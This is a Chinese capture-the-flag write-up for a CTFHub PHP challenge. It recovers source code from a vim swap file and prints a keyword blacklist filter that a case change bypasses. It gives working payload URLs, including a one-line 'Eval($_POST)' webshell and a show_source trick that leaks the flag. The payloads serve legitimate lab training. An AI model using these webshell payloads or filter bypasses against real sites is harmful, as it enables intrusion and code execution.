复现环境

https://www.ctfhub.com/#/challenge

考察知识点

• 代码审计
• 正则表达式绕过

解题分析

访问robots.txt发现提示 1ndexx.php

view-source:http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/robots.txt

robots.txt

直接访问不到，需要访问vim的保存的缓冲类型文件.swp，访问之后获取到源码。

view-source:http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/.1ndexx.php.swp

.1ndexx.php.swp

把关键代码粘贴出来看一下运行流程

1. 打开flag.php读取文件内容

2. 打开hack.php文件，获取code参数

3. 正则匹配危险函数

4. 字符串长度不能超过33

5. 将code参数的内容写入hack.php

6. 将flag.php内容写入hack.php

<?php
#Really easy...
$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));
$hack=fopen("hack.php","w") or die("Unable 2 open");
$a=$_GET['code'];
if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
 die("you die");
}
if(strlen($a)>33){
 die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);
fclose($file);
fclose($hack);
?>

测试：输出phpinfo()，phpinfo不是过滤函数，传入之后访问hack.php可利用成功

http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/index.php?code=%3C?=phpinfo();?%3E

phpinfo

利用方式1：大小写过滤，利用Eval绕过eval限制，成功获取webshell

http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/index.php?code=%3C?php%20@Eval($_POST[%27aaa%27]);?%3E

Eval

利用方式2：利用show_source高亮代码，再看代码的时候注意到flag.php里的内容会被写入到hack.php中，这样只需要高亮自己就可以看到flag了。

http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/index.php?code=%3C?php%20show_source(FILE);?%3E

show_source

结束收工！